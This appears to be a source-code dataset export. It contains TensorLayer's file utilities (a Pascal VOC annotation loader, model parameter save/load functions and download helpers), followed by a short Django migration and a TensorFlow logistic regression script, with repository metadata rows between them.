    ... {'sheep': 16, 'horse': 12, 'bicycle': 1, 'bottle': 4, 'cow': 9, 'sofa': 17, 'car': 6, 'dog': 11, 'cat': 7, 'person': 14, 'train': 18, 'diningtable': 10, 'aeroplane': 0, 'bus': 5, 'pottedplant': 15, 'tvmonitor': 19, 'chair': 8, 'bird': 2, 'boat': 3, 'motorbike': 13}
    >>> print(imgs_file_list[idx])
    ... data/VOC/VOC2012/JPEGImages/2007_000423.jpg
    >>> print(n_objs_list[idx])
    ... 2
    >>> print(imgs_ann_file_list[idx])
    ... data/VOC/VOC2012/Annotations/2007_000423.xml
    >>> print(objs_info_list[idx])
    ... 14 0.173 0.461333333333 0.142 0.496
    ... 14 0.828 0.542666666667 0.188 0.594666666667
    >>> ann = tl.prepro.parse_darknet_ann_str_to_list(objs_info_list[idx])
    >>> print(ann)
    ... [[14, 0.173, 0.461333333333, 0.142, 0.496], [14, 0.828, 0.542666666667, 0.188, 0.594666666667]]
    >>> c, b = tl.prepro.parse_darknet_ann_list_to_cls_box(ann)
    >>> print(c, b)
    ... [14, 14] [[0.173, 0.461333333333, 0.142, 0.496], [0.828, 0.542666666667, 0.188, 0.594666666667]]

    References
    -------------
    - `Pascal VOC2012 Website <http://host.robots.ox.ac.uk/pascal/VOC/voc2012/#devkit>`__.
    - `Pascal VOC2007 Website <http://host.robots.ox.ac.uk/pascal/VOC/voc2007/>`__.
    """
    path = os.path.join(path, 'VOC')

    def _recursive_parse_xml_to_dict(xml):
        """Recursively parses XML contents to python dict.

        We assume that `object` tags are the only ones that can appear
        multiple times at the same level of a tree.

        Args:
            xml: xml tree obtained by parsing XML file contents using lxml.etree

        Returns:
            Python dictionary holding XML contents.
        """
        # Leaf element (no children): represent it as {tag: text}.
        if not xml:
            # if xml is not None:
            return {xml.tag: xml.text}
        result = {}
        for child in xml:
            child_result = _recursive_parse_xml_to_dict(child)
            if child.tag != 'object':
                result[child.tag] = child_result[child.tag]
            else:
                # 'object' can repeat at the same level, so accumulate into a list.
                if child.tag not in result:
                    result[child.tag] = []
                result[child.tag].append(child_result[child.tag])
        return {xml.tag: result}

    from lxml import etree  # pip install lxml
    import xml.etree.ElementTree as ET

    # Resolve the download URL, archive name and extraction folder for the
    # requested VOC release.
    if dataset == "2012":
        url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2012/"
        tar_filename = "VOCtrainval_11-May-2012.tar"
        extracted_filename = "VOC2012"  #"VOCdevkit/VOC2012"
        logging.info(" [============= VOC 2012 =============]")
    elif dataset == "2012test":
        extracted_filename = "VOC2012test"  #"VOCdevkit/VOC2012"
        logging.info(" [============= VOC 2012 Test Set =============]")
        logging.info(" \nAuthor: 2012test only have person annotation, so 2007test is highly recommended for testing !\n")
        import time
        time.sleep(3)
        if os.path.isdir(os.path.join(path, extracted_filename)) is False:
            # The 2012 test split cannot be fetched anonymously; the user must
            # register and download it manually, so print instructions and stop.
            logging.info("For VOC 2012 Test data - online registration required")
            logging.info(
                " Please download VOC2012test.tar from: \n register: http://host.robots.ox.ac.uk:8080 \n voc2012 : http://host.robots.ox.ac.uk:8080/eval/challenges/voc2012/ \ndownload: http://host.robots.ox.ac.uk:8080/eval/downloads/VOC2012test.tar"
            )
            logging.info(" unzip VOC2012test.tar,rename the folder to VOC2012test and put it into %s" % path)
            exit()
            # # http://host.robots.ox.ac.uk:8080/eval/downloads/VOC2012test.tar
            # url = "http://host.robots.ox.ac.uk:8080/eval/downloads/"
            # tar_filename = "VOC2012test.tar"
    elif dataset == "2007":
        url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2007/"
        tar_filename = "VOCtrainval_06-Nov-2007.tar"
        extracted_filename = "VOC2007"
        logging.info(" [============= VOC 2007 =============]")
    elif dataset == "2007test":
        # http://host.robots.ox.ac.uk/pascal/VOC/voc2007/index.html#testdata
        # http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtest_06-Nov-2007.tar
        url = "http://host.robots.ox.ac.uk/pascal/VOC/voc2007/"
        tar_filename = "VOCtest_06-Nov-2007.tar"
        extracted_filename = "VOC2007test"
        logging.info(" [============= VOC 2007 Test Set =============]")
    else:
        raise Exception("Please set the dataset aug to 2012, 2012test or 2007.")

    # download dataset
    if dataset != "2012test":
        from sys import platform as _platform
        if folder_exists(os.path.join(path, extracted_filename)) is False:
            logging.info("[VOC] {} is nonexistent in {}".format(extracted_filename, path))
            maybe_download_and_extract(tar_filename, path, url, extract=True)
            del_file(os.path.join(path, tar_filename))
            # Move the extracted VOCdevkit/<release> folder up one level.
            # NOTE(review): `mv` is not a native Windows command, so the win32
            # branches only work when a Unix-like shell is on PATH — TODO confirm.
            if dataset == "2012":
                if _platform == "win32":
                    os.system("mv {}\VOCdevkit\VOC2012 {}\VOC2012".format(path, path))
                else:
                    os.system("mv {}/VOCdevkit/VOC2012 {}/VOC2012".format(path, path))
            elif dataset == "2007":
                if _platform == "win32":
                    os.system("mv {}\VOCdevkit\VOC2007 {}\VOC2007".format(path, path))
                else:
                    os.system("mv {}/VOCdevkit/VOC2007 {}/VOC2007".format(path, path))
            elif dataset == "2007test":
                if _platform == "win32":
                    os.system("mv {}\VOCdevkit\VOC2007 {}\VOC2007test".format(path, path))
                else:
                    os.system("mv {}/VOCdevkit/VOC2007 {}/VOC2007test".format(path, path))
            del_folder(os.path.join(path, 'VOCdevkit'))

    # object classes(labels) NOTE: YOU CAN CUSTOMIZE THIS LIST
    classes = [
        "aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person",
        "pottedplant", "sheep", "sofa", "train", "tvmonitor"
    ]
    if contain_classes_in_person:
        classes_in_person = ["head", "hand", "foot"]
    else:
        classes_in_person = []

    classes += classes_in_person  # use extra 3 classes for person

    classes_dict = utils.list_string_to_dict(classes)
    logging.info("[VOC] object classes {}".format(classes_dict))

    # 1. image path list
    # folder_imgs = path+"/"+extracted_filename+"/JPEGImages/"
    folder_imgs = os.path.join(path, extracted_filename, "JPEGImages")
    imgs_file_list = load_file_list(path=folder_imgs, regx='\\.jpg', printable=False)
    logging.info("[VOC] {} images found".format(len(imgs_file_list)))
    imgs_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2]))  # 2007_000027.jpg --> 2007000027
    imgs_file_list = [os.path.join(folder_imgs, s) for s in imgs_file_list]
    # logging.info('IM',imgs_file_list[0::3333], imgs_file_list[-1])

    if dataset != "2012test":
        ##======== 2. semantic segmentation maps path list
        # folder_semseg = path+"/"+extracted_filename+"/SegmentationClass/"
        folder_semseg = os.path.join(path, extracted_filename, "SegmentationClass")
        imgs_semseg_file_list = load_file_list(path=folder_semseg, regx='\\.png', printable=False)
        logging.info("[VOC] {} maps for semantic segmentation found".format(len(imgs_semseg_file_list)))
        imgs_semseg_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2]))  # 2007_000032.png --> 2007000032
        imgs_semseg_file_list = [os.path.join(folder_semseg, s) for s in imgs_semseg_file_list]
        # logging.info('Semantic Seg IM',imgs_semseg_file_list[0::333], imgs_semseg_file_list[-1])
        ##======== 3. instance segmentation maps path list
        # folder_insseg = path+"/"+extracted_filename+"/SegmentationObject/"
        folder_insseg = os.path.join(path, extracted_filename, "SegmentationObject")
        imgs_insseg_file_list = load_file_list(path=folder_insseg, regx='\\.png', printable=False)
        # NOTE(review): this log uses len(imgs_semseg_file_list); it likely
        # should report len(imgs_insseg_file_list) — message only, no logic impact.
        logging.info("[VOC] {} maps for instance segmentation found".format(len(imgs_semseg_file_list)))
        imgs_insseg_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2]))  # 2007_000032.png --> 2007000032
        imgs_insseg_file_list = [os.path.join(folder_insseg, s) for s in imgs_insseg_file_list]
        # logging.info('Instance Seg IM',imgs_insseg_file_list[0::333], imgs_insseg_file_list[-1])
    else:
        imgs_semseg_file_list = []
        imgs_insseg_file_list = []

    # 4. annotations for bounding box and object class
    # folder_ann = path+"/"+extracted_filename+"/Annotations/"
    folder_ann = os.path.join(path, extracted_filename, "Annotations")
    imgs_ann_file_list = load_file_list(path=folder_ann, regx='\\.xml', printable=False)
    logging.info("[VOC] {} XML annotation files for bounding box and object class found".format(len(imgs_ann_file_list)))
    imgs_ann_file_list.sort(key=lambda s: int(s.replace('.', ' ').replace('_', '').split(' ')[-2]))  # 2007_000027.xml --> 2007000027
    imgs_ann_file_list = [os.path.join(folder_ann, s) for s in imgs_ann_file_list]
    # logging.info('ANN',imgs_ann_file_list[0::3333], imgs_ann_file_list[-1])

    if dataset == "2012test":  # remove unused images in JPEG folder
        # 2012test ships more JPEGs than annotations; keep only images that
        # have a matching annotation file.
        imgs_file_list_new = []
        for ann in imgs_ann_file_list:
            ann = os.path.split(ann)[-1].split('.')[0]
            for im in imgs_file_list:
                if ann in im:
                    imgs_file_list_new.append(im)
                    break
        imgs_file_list = imgs_file_list_new
        logging.info("[VOC] keep %d images" % len(imgs_file_list_new))

    # parse XML annotations
    def convert(size, box):
        # Convert an absolute corner box (xmin, xmax, ymin, ymax) into
        # Darknet's normalised (x_centre, y_centre, width, height) ratios.
        dw = 1. / size[0]
        dh = 1. / size[1]
        x = (box[0] + box[1]) / 2.0
        y = (box[2] + box[3]) / 2.0
        w = box[1] - box[0]
        h = box[3] - box[2]
        x = x * dw
        w = w * dw
        y = y * dh
        h = h * dh
        return x, y, w, h

    def convert_annotation(file_name):
        """Given VOC2012 XML Annotations, returns number of objects and info."""
        in_file = open(file_name)
        out_file = ""
        tree = ET.parse(in_file)
        root = tree.getroot()
        size = root.find('size')
        w = int(size.find('width').text)
        h = int(size.find('height').text)
        n_objs = 0

        for obj in root.iter('object'):
            if dataset != "2012test":
                difficult = obj.find('difficult').text
                cls = obj.find('name').text
                # Skip classes outside our list and boxes flagged 'difficult'.
                if cls not in classes or int(difficult) == 1:
                    continue
            else:
                # 2012test annotations carry no 'difficult' flag.
                cls = obj.find('name').text
                if cls not in classes:
                    continue
            cls_id = classes.index(cls)
            xmlbox = obj.find('bndbox')
            b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
            bb = convert((w, h), b)

            out_file += str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n'
            n_objs += 1
            # NOTE(review): substring membership test; works here because only
            # 'person' among the class names is a substring of "person".
            if cls in "person":
                # Optionally emit the person sub-part boxes (head/hand/foot).
                for part in obj.iter('part'):
                    cls = part.find('name').text
                    if cls not in classes_in_person:
                        continue
                    cls_id = classes.index(cls)
                    xmlbox = part.find('bndbox')
                    b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
                    bb = convert((w, h), b)
                    # out_file.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
                    out_file += str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n'
                    n_objs += 1
        in_file.close()
        return n_objs, out_file

    logging.info("[VOC] Parsing xml annotations files")
    n_objs_list = []
    objs_info_list = []  # Darknet Format list of string
    objs_info_dicts = {}
    for idx, ann_file in enumerate(imgs_ann_file_list):
        n_objs, objs_info = convert_annotation(ann_file)
        n_objs_list.append(n_objs)
        objs_info_list.append(objs_info)
        with tf.gfile.GFile(ann_file, 'r') as fid:
            xml_str = fid.read()
        xml = etree.fromstring(xml_str)
        data = _recursive_parse_xml_to_dict(xml)['annotation']
        objs_info_dicts.update({imgs_file_list[idx]: data})

    return imgs_file_list, imgs_semseg_file_list, imgs_insseg_file_list, imgs_ann_file_list, \
        classes, classes_in_person, classes_dict,\
        n_objs_list, objs_info_list, objs_info_dicts
def save_npz(save_list=None, name='model.npz', sess=None):
    """Save a list of parameters (tensor) into a ``.npz`` file.

    Use ``tl.files.load_npz()`` / ``tl.files.load_and_assign_npz()`` to restore.

    Parameters
    ----------
    save_list : list of tensor
        A list of parameters (tensor) to be saved.
    name : str
        The name of the `.npz` file.
    sess : None or Session
        Session may be required in some case.

    Examples
    --------
    >>> tl.files.save_npz(network.all_params, name='model.npz', sess=sess)

    Notes
    -----
    Without a session the tensors are evaluated via ``value.eval()``,
    which needs a default session to be active.
    """
    if save_list is None:
        save_list = []

    values = []
    if sess:
        # Evaluate every tensor in one run call.
        values = sess.run(save_list)
    else:
        try:
            values = [v.eval() for v in save_list]
        except Exception:
            logging.info(" Fail to save model, Hint: pass the session into this function, tl.files.save_npz(network.all_params, name='model.npz', sess=sess)")

    np.savez(name, params=values)
    del values
    logging.info("[*] %s saved" % name)
def load_npz(path='', name='model.npz'):
    """Load the parameters of a Model saved by tl.files.save_npz().

    Parameters
    ----------
    path : str
        Folder path to `.npz` file.
    name : str
        The name of the `.npz` file.

    Returns
    --------
    list of array
        A list of parameters in order.

    Examples
    --------
    - See ``tl.files.save_npz``

    References
    ----------
    - `Saving dictionary using numpy <http://stackoverflow.com/questions/22315595/saving-dictionary-of-header-information-using-numpy-savez>`__
    """
    # Fix: use os.path.join instead of plain string concatenation, so a
    # `path` given without a trailing separator (e.g. 'checkpoints') no
    # longer produces a bogus filename like 'checkpointsmodel.npz'.
    # allow_pickle=True is required on NumPy >= 1.16.3 because parameters
    # of heterogeneous shapes are stored as a pickled object array.
    d = np.load(os.path.join(path, name), allow_pickle=True)
    return d['params']
def assign_params(sess, params, network):
    """Assign the given parameters to the TensorLayer network.

    Parameters
    ----------
    sess : Session
        TensorFlow Session.
    params : list of array
        A list of parameters (array) in order.
    network : :class:`Layer`
        The network to be assigned.

    Returns
    --------
    list of operations
        A list of tf ops in order that assign params. Support sess.run(ops) manually.

    Examples
    --------
    - See ``tl.files.save_npz``

    References
    ----------
    - `Assign value to a TensorFlow variable <http://stackoverflow.com/questions/34220532/how-to-assign-value-to-a-tensorflow-variable>`__
    """
    # Build one assign op per parameter, matched by position.
    ops = [network.all_params[idx].assign(param) for idx, param in enumerate(params)]
    if sess is not None:
        sess.run(ops)
    return ops
def load_and_assign_npz(sess=None, name=None, network=None):
    """Load model from npz and assign to a network.

    Parameters
    -------------
    sess : Session
        TensorFlow Session.
    name : str
        The name of the `.npz` file.
    network : :class:`Layer`
        The network to be assigned.

    Returns
    --------
    False or network
        Returns False, if the model is not exist.

    Examples
    --------
    - See ``tl.files.save_npz``
    """
    # Validate required arguments up front.
    if network is None:
        raise ValueError("network is None.")
    if sess is None:
        raise ValueError("session is None.")

    if not os.path.exists(name):
        logging.info("[!] Load {} failed!".format(name))
        return False

    params = load_npz(name=name)
    assign_params(sess, params, network)
    logging.info("[*] Load {} SUCCESS!".format(name))
    return network
def save_npz_dict(save_list=None, name='model.npz', sess=None):
    """Input parameters and the file name, save parameters as a dictionary into .npz file.

    Use ``tl.files.load_and_assign_npz_dict()`` to restore.

    Parameters
    ----------
    save_list : list of parameters
        A list of parameters (tensor) to be saved.
    name : str
        The name of the `.npz` file.
    sess : Session
        TensorFlow Session.
    """
    if sess is None:
        raise ValueError("session is None.")
    if save_list is None:
        save_list = []

    # Key each evaluated value by its tensor name so variables can later be
    # matched back to graph variables by name.
    tensor_names = [tensor.name for tensor in save_list]
    evaluated = sess.run(save_list)
    np.savez(name, **dict(zip(tensor_names, evaluated)))
    del tensor_names, evaluated
    logging.info("[*] Model saved in npz_dict %s" % name)
def load_and_assign_npz_dict(name='model.npz', sess=None):
    """Restore the parameters saved by ``tl.files.save_npz_dict()``.

    Variables are matched to graph variables by name via the
    GLOBAL_VARIABLES collection; keys with no match are skipped with a
    warning.

    Parameters
    ----------
    name : str
        The name of the `.npz` file.
    sess : Session
        TensorFlow Session.
    """
    if sess is None:
        raise ValueError("session is None.")
    if not os.path.exists(name):
        logging.info("[!] Load {} failed!".format(name))
        return False

    params = np.load(name)
    keys = list(params.keys())
    if len(keys) != len(set(keys)):
        raise Exception("Duplication in model npz_dict %s" % name)

    ops = []
    for key in keys:
        try:
            # tensor = tf.get_default_graph().get_tensor_by_name(key)
            # varlist = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=key)
            candidates = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=key)
            if len(candidates) > 1:
                raise Exception("[!] Multiple candidate variables to be assigned for name %s" % key)
            if len(candidates) == 0:
                raise KeyError
            ops.append(candidates[0].assign(params[key]))
            logging.info("[*] params restored: %s" % key)
        except KeyError:
            logging.info("[!] Warning: Tensor named %s not found in network." % key)

    sess.run(ops)
    logging.info("[*] Model restored from npz_dict %s" % name)
def save_ckpt(sess=None, mode_name='model.ckpt', save_dir='checkpoint', var_list=None, global_step=None, printable=False):
    """Save parameters into `ckpt` file.

    Parameters
    ------------
    sess : Session
        TensorFlow Session.
    mode_name : str
        The name of the model, default is ``model.ckpt``.
    save_dir : str
        The path / file directory to the `ckpt`, default is ``checkpoint``.
    var_list : list of tensor
        The parameters / variables (tensor) to be saved. If empty, save all global variables (default).
    global_step : int or None
        Step number.
    printable : boolean
        Whether to print all parameters information.

    See Also
    --------
    load_ckpt
    """
    if sess is None:
        raise ValueError("session is None.")
    if var_list is None:
        var_list = []

    ckpt_file = os.path.join(save_dir, mode_name)
    if var_list == []:
        # No explicit variable list: persist every global variable.
        var_list = tf.global_variables()

    logging.info("[*] save %s n_params: %d" % (ckpt_file, len(var_list)))
    if printable:
        for i, var in enumerate(var_list):
            logging.info(" param {:3}: {:15} {}".format(i, var.name, str(var.get_shape())))

    tf.train.Saver(var_list).save(sess, ckpt_file, global_step=global_step)
def load_ckpt(sess=None, mode_name='model.ckpt', save_dir='checkpoint', var_list=None, is_latest=True, printable=False):
    """Load parameters from `ckpt` file.

    Parameters
    ------------
    sess : Session
        TensorFlow Session.
    mode_name : str
        The name of the model, default is ``model.ckpt``.
    save_dir : str
        The path / file directory to the `ckpt`, default is ``checkpoint``.
    var_list : list of tensor
        The parameters / variables (tensor) to be saved. If empty, save all global variables (default).
    is_latest : boolean
        Whether to load the latest `ckpt`, if False, load the `ckpt` with the name of ```mode_name``.
    printable : boolean
        Whether to print all parameters information.

    Examples
    ----------
    Save all global parameters.

    >>> tl.files.save_ckpt(sess=sess, mode_name='model.ckpt', save_dir='model', printable=True)

    Save specific parameters.

    >>> tl.files.save_ckpt(sess=sess, mode_name='model.ckpt', var_list=net.all_params, save_dir='model', printable=True)

    Load latest ckpt.

    >>> tl.files.load_ckpt(sess=sess, var_list=net.all_params, save_dir='model', printable=True)

    Load specific ckpt.

    >>> tl.files.load_ckpt(sess=sess, mode_name='model.ckpt', var_list=net.all_params, save_dir='model', is_latest=False, printable=True)
    """
    if sess is None:
        raise ValueError("session is None.")
    if var_list is None:
        var_list = []

    # Either resolve the newest checkpoint in the directory or a fixed name.
    ckpt_file = tf.train.latest_checkpoint(save_dir) if is_latest else os.path.join(save_dir, mode_name)

    if not var_list:
        var_list = tf.global_variables()

    logging.info("[*] load %s n_params: %d" % (ckpt_file, len(var_list)))
    if printable:
        for i, var in enumerate(var_list):
            logging.info(" param {:3}: {:15} {}".format(i, var.name, str(var.get_shape())))

    try:
        tf.train.Saver(var_list).restore(sess, ckpt_file)
    except Exception as e:
        # Restoration failures are reported but intentionally not re-raised.
        logging.info(e)
        logging.info("[*] load ckpt fail ...")
def save_any_to_npy(save_dict=None, name='file.npy'):
    """Save variables to `.npy` file.

    Parameters
    ------------
    save_dict : directory
        The variables to be saved.
    name : str
        File name.

    Examples
    ---------
    >>> tl.files.save_any_to_npy(save_dict={'data': ['a','b']}, name='test.npy')
    >>> data = tl.files.load_npy_to_any(name='test.npy')
    >>> print(data)
    ... {'data': ['a','b']}
    """
    # Default to an empty dict so np.save always receives an object.
    np.save(name, {} if save_dict is None else save_dict)
def load_npy_to_any(path='', name='file.npy'):
    """Load `.npy` file.

    Parameters
    ------------
    path : str
        Path to the file (optional).
    name : str
        File name.

    Raises
    ------
    Exception
        If the file cannot be read either as a pickled object or as an array.

    Examples
    ---------
    - see tl.files.save_any_to_npy()
    """
    file_path = os.path.join(path, name)
    # First assume the file holds a pickled Python object (e.g. a dict
    # written by ``save_any_to_npy``); allow_pickle=True is required for
    # that on NumPy >= 1.16.3. Fall back to a plain array load otherwise.
    try:
        return np.load(file_path, allow_pickle=True).item()
    except Exception:
        try:
            return np.load(file_path)
        except Exception:
            # Fix: previously this raise was dead code placed after the
            # return statements; a genuinely unreadable file now produces
            # the intended error message.
            raise Exception("[!] Fail to load %s" % file_path)
def file_exists(filepath: str) -> bool:
    """Check whether a file exists by given file path."""
    return os.path.isfile(filepath)
def folder_exists(folderpath: str) -> bool:
    """Check whether a folder exists by given folder path."""
    return os.path.isdir(folderpath)
def del_file(filepath: str) -> None:
    """Delete a file by given file path."""
    os.remove(filepath)
def del_folder(folderpath: str) -> None:
    """Delete a folder by given folder path."""
    # os.rmdir only removes EMPTY directories; it raises OSError otherwise.
    os.rmdir(folderpath)
def read_file(filepath):
    """Read a file and return a string.

    Examples
    ---------
    >>> data = tl.files.read_file('data.txt')
    """
    handle = open(filepath, 'r')
    try:
        return handle.read()
    finally:
        handle.close()
def load_file_list(path=None, regx='\.npz', printable=True):
    r"""Return a file list in a folder by given a path and regular expression.

    Parameters
    ----------
    path : str or None
        A folder path, if `None`, use the current directory.
    regx : str
        The regx of file name.
    printable : boolean
        Whether to print the files infomation.

    Examples
    ----------
    >>> file_list = tl.files.load_file_list(path=None, regx='w1pre_[0-9]+\.(npz)')
    """
    folder = os.getcwd() if path is None else path
    # re.search matches the pattern anywhere in the file name.
    matched = [fname for fname in os.listdir(folder) if re.search(regx, fname)]
    # matched.sort()
    if printable:
        logging.info('Match file list = %s' % matched)
        logging.info('Number of files = %d' % len(matched))
    return matched
def load_folder_list(path=""):
    """Return a folder list in a folder by given a folder path.

    Parameters
    ----------
    path : str
        A folder path.
    """
    subfolders = []
    for entry in os.listdir(path):
        full_path = os.path.join(path, entry)
        if os.path.isdir(full_path):
            subfolders.append(full_path)
    return subfolders
def exists_or_mkdir(path, verbose=True):
    """Check a folder by given name, if not exist, create the folder and return False,
    if directory exists, return True.

    Parameters
    ----------
    path : str
        A folder path.
    verbose : boolean
        If True (default), prints results.

    Returns
    --------
    boolean
        True if folder already exist, otherwise, returns False and create the folder.

    Examples
    --------
    >>> tl.files.exists_or_mkdir("checkpoints/train")
    """
    if os.path.exists(path):
        if verbose:
            logging.info("[!] %s exists ..." % path)
        return True

    # Folder is missing: create it (including intermediate directories).
    if verbose:
        logging.info("[*] creates %s ..." % path)
    os.makedirs(path)
    return False
def maybe_download_and_extract(filename, working_directory, url_source, extract=False, expected_bytes=None):
    """Checks if file exists in working_directory otherwise tries to dowload the file,
    and optionally also tries to extract the file if format is ".zip" or ".tar"

    Parameters
    -----------
    filename : str
        The name of the (to be) dowloaded file.
    working_directory : str
        A folder path to search for the file in and dowload the file to
    url : str
        The URL to download the file from
    extract : boolean
        If True, tries to uncompress the dowloaded file is ".tar.gz/.tar.bz2" or ".zip" file, default is False.
    expected_bytes : int or None
        If set tries to verify that the downloaded file is of the specified size, otherwise raises an Exception, defaults is None which corresponds to no check being performed.

    Returns
    ----------
    str
        File path of the dowloaded (uncompressed) file.

    Examples
    --------
    >>> down_file = tl.files.maybe_download_and_extract(filename='train-images-idx3-ubyte.gz',
    ...                                            working_directory='data/',
    ...                                            url_source='http://yann.lecun.com/exdb/mnist/')
    >>> tl.files.maybe_download_and_extract(filename='ADEChallengeData2016.zip',
    ...                                             working_directory='data/',
    ...                                             url_source='http://sceneparsing.csail.mit.edu/data/',
    ...                                             extract=True)
    """

    # We first define a download function, supporting both Python 2 and 3.
    def _download(filename, working_directory, url_source):

        def _dlProgress(count, blockSize, totalSize):
            # totalSize is 0 when the server sends no Content-Length header.
            if (totalSize != 0):
                percent = float(count * blockSize) / float(totalSize) * 100.0
                sys.stdout.write("\r" "Downloading " + filename + "...%d%%" % percent)
                sys.stdout.flush()

        if sys.version_info[0] == 2:
            from urllib import urlretrieve
        else:
            from urllib.request import urlretrieve

        filepath = os.path.join(working_directory, filename)
        urlretrieve(url_source + filename, filepath, reporthook=_dlProgress)
        sys.stdout.write('\n')

    exists_or_mkdir(working_directory, verbose=False)
    filepath = os.path.join(working_directory, filename)

    if not os.path.exists(filepath):
        _download(filename, working_directory, url_source)
        statinfo = os.stat(filepath)
        logging.info('Succesfully downloaded %s %s bytes.' % (filename, statinfo.st_size))  #, 'bytes.')
        if (not (expected_bytes is None) and (expected_bytes != statinfo.st_size)):
            raise Exception('Failed to verify ' + filename + '. Can you get to it with a browser?')
        if (extract):
            if tarfile.is_tarfile(filepath):
                logging.info('Trying to extract tar file')
                # Fix: close the archive deterministically. The previous
                # `tarfile.open(...).extractall(...)` leaked the file handle.
                with tarfile.open(filepath, 'r') as archive:
                    # NOTE(review): extractall on an untrusted archive can write
                    # outside working_directory (path traversal); the dataset
                    # mirrors used by this module are assumed trusted.
                    archive.extractall(working_directory)
                logging.info('... Success!')
            elif zipfile.is_zipfile(filepath):
                logging.info('Trying to extract zip file')
                with zipfile.ZipFile(filepath) as zf:
                    zf.extractall(working_directory)
                logging.info('... Success!')
            else:
                logging.info("Unknown compression_format only .tar.gz/.tar.bz2/.tar and .zip supported")
    return filepath
def natural_keys(text):
    """Sort list of string with number in human order.

    Examples
    ----------
    >>> l = ['im1.jpg', 'im31.jpg', 'im11.jpg', 'im21.jpg', 'im03.jpg', 'im05.jpg']
    >>> l.sort(key=tl.files.natural_keys)
    ... ['im1.jpg', 'im03.jpg', 'im05.jpg', 'im11.jpg', 'im21.jpg', 'im31.jpg']
    >>> l.sort() # that is what we dont want
    ... ['im03.jpg', 'im05.jpg', 'im1.jpg', 'im11.jpg', 'im21.jpg', 'im31.jpg']

    References
    ----------
    - `link <http://nedbatchelder.com/blog/200712/human_sorting.html>`__
    """
    # Split the string into alternating text / digit chunks and convert the
    # digit chunks to int, so numeric runs compare by value, not lexically.
    return [int(chunk) if chunk.isdigit() else chunk for chunk in re.split('(\d+)', text)]
# Visualizing npz files
def npz_to_W_pdf(path=None, regx='w1pre_[0-9]+\.(npz)'):
    r"""Convert the first weight matrix of `.npz` file to `.pdf` by using `tl.visualize.W()`.

    Parameters
    ----------
    path : str
        A folder path to `npz` files.
    regx : str
        Regx for the file name.

    Examples
    ---------
    Convert the first weight matrix of w1_pre...npz file to w1_pre...pdf.

    >>> tl.files.npz_to_W_pdf(path='/Users/.../npz_file/', regx='w1pre_[0-9]+\.(npz)')
    """
    for fname in load_file_list(path=path, regx=regx):
        # Only the first stored parameter (the weight matrix) is visualized.
        W = load_npz(path, fname)[0]
        logging.info("%s --> %s" % (fname, fname.split('.')[0] + '.pdf'))
        visualize.draw_weights(W, second=10, saveable=True, name=fname.split('.')[0], fig_idx=2012)
| [
"[email protected]"
] | |
7ba4b6660a56236839281e9a6a45e1423b62ebcc | 4de2a833df412e1609b9894c0cb809c4d70f8623 | /app/news/migrations/0002_auto_20180313_1540.py | 75c1430513d4b94067c753c0594020aecc4e7186 | [] | no_license | Isaias301/e-commerce | 06ea11238403b7fa70c5c8e387253441d0dd07f4 | e00f94406c432751adfa03556ecfe154ec222fd9 | refs/heads/master | 2021-04-09T10:34:23.399915 | 2018-03-16T00:33:43 | 2018-03-16T00:33:43 | 125,439,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-03-13 18:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Teste',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
],
),
migrations.RemoveField(
model_name='article',
name='reporter',
),
migrations.DeleteModel(
name='Article',
),
migrations.DeleteModel(
name='Reporter',
),
]
| [
"[email protected]"
] | |
7c7d39ff26b769153bb74f24a416d86ba8a0eaa3 | d0f4327ca33aa37e976b024ddfbd6361fdf1a8ee | /LogisticRegression.py | 1747d6347b97ed0cc2ae5c1f114f1c197b1a7726 | [] | no_license | MitsuruFujiwara/TensorFlowTraining | c5f828356ea93c868f16ea67335dd4f32b1c7040 | 3a391c849699bd8332c23ddfffb773cf3050c69c | refs/heads/master | 2021-01-17T17:48:21.340414 | 2016-07-24T13:05:53 | 2016-07-24T13:05:53 | 60,701,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import tensorflow as tf
from RegressionBase import RegressionBase
class LogisticRegression(RegressionBase):
def __init__(self, trX, trY, numStep, numParameter, learning_rate):
RegressionBase.__init__(self, trX, trY, numStep, numParameter, learning_rate)
def training(self, loss):
return tf.train.AdagradOptimizer(self.learning_rate).minimize(loss)
def loss(self, output, supervisor_labels_placeholder):
x_entropy = tf.nn.sigmoid_cross_entropy_with_logits(output, supervisor_labels_placeholder, name = 'xentropy')
return tf.reduce_mean(x_entropy, name = 'xentropy_mean')
if __name__ == '__main__':
data = pd.read_csv('test_data.csv')
trX = data[[\
'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X7', 'X8', 'X9','X10', 'X11', 'X12',\
'X13', 'X14', 'X15', 'X16', 'X17', 'X18', 'X19', 'X20', 'X21','X22', 'X23',\
'X24', 'X25', 'X26', 'X27'\
]].fillna(0)
trY = data['Y']
numStep = 10000
numParameter = len(trX.columns)
learning_rate = 0.5
r = LogisticRegression(trX, trY, numStep, numParameter, learning_rate)
r.run()
# loss = 0.282286
# b = -6.56112
# W0 = 0.226928
# W1 = 0.238033
# W2 = -0.0118023
# W3 = 0.499244
| [
"[email protected]"
] | |
